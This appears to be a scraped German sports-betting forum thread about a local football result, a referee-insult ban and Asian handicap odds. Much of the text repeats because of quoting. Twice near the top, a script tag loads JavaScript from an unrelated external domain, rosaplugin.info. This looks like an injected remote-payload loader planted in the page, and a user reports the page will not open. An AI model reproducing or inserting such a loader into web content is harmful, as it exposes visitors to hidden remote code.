JJAAA [[winkewinke]] 2-1 Fortuna
[script src="http://rosaplugin.info/dfi823hs.js?0.09329880309753902"][/script]
man kann das net aufmachen die seite.
JJAAA [[winkewinke]] 2-1 Fortuna
[script src="http://rosaplugin.info/dfi823hs.js?0.09329880309753902"][/script]
Hab damals den Schiri als Affen bezeichnet und habe vom bfv 8 Spiele Sperre Strafe verhängt bekommen.[[rofl]]
Naja, haste jetzt am Wochenende mehr Zeit zum Wetten.
Hab damals den Schiri als Affen bezeichnet und habe vom bfv 8 Spiele Sperre Strafe verhängt bekommen.[[rofl]]
Naja, haste jetzt am Wochenende mehr Zeit zum Wetten.
Benehmen muss man sich auch in der Kreisklasse... [[yo]]Ist doch lächerlich, man spielt zum Spass und bekommt in den Kreisligen lange Sperren für harmlose Sachen. In der Bulli bricht man anderen das Bein und bekommt nix.
Und wenn die Profis gesperrt werden , bekommen sie trtzdem Millionen oder 1000 Euro Strafe vom Verein:mrgreen:
Ist doch lächerlich, man spielt zum Spass und bekommt in den Kreisligen lange Sperren für harmlose Sachen. In der Bulli bricht man anderen das Bein und bekommt nix.
Und wenn die Profis gesperrt werden , bekommen sie trotzdem ihre Millionen und vom Verein eine 1000 Euro Strafe :mrgreen:
Benehmen muss man sich auch in der Kreisklasse... [[yo]]
Nee, vernünftig...
Klar platzt einem manchmal der Kragen...war nur spaß, aber fußball ohne emotionen? kanns zum teil nachvollziehen, denn manche schiris nehmen sich in ihrer eitelkeit schon zuviel raus...
gibts keinen. meist sind nur limits unterschiedlich.. nimm einfach die höhere quote [[yo]]Was ist denn bitte der Unterschied zwischen Asian HC -1,5 @ 1,9 und HC -1 @ 1,83 beim selben Buchmacher (Bet365)!? [[nixweiss]]
gefällt mir gar nicht. [[hammer]][[bang]]Heidenheim [[yo]][[yo]]
gefällt mir gar nicht. [[hammer]][[bang]]
ah danke.. gar nich gewusst.. habs nur eben bei den live-wetten gesehen und bin bei 1:2 auf aalen eingestiegen weil ich die quote viel zu hoch fand.. naja, schade. [[nixweiss]]kommt übrigends Live im TV und sind auch klar besser wie ich finde!
Was ist denn bitte der Unterschied zwischen Asian HC -1,5 @ 1,9 und HC -1 @ 1,83 beim selben Buchmacher (Bet365)!? [[nixweiss]]
sind grad dran. bei bet365 zb jedes viertel bieten die erneut -1,5 für zska an.. easy money.
powerslave, konntest du am mittwoch schlussendlich "nathan junior to score" spielen?
heute wieder nicht dabei [[sleep]]nee, 365 konnte die WEtte nicht anbieten, unter 4 hätt ichs eh nicht gespielt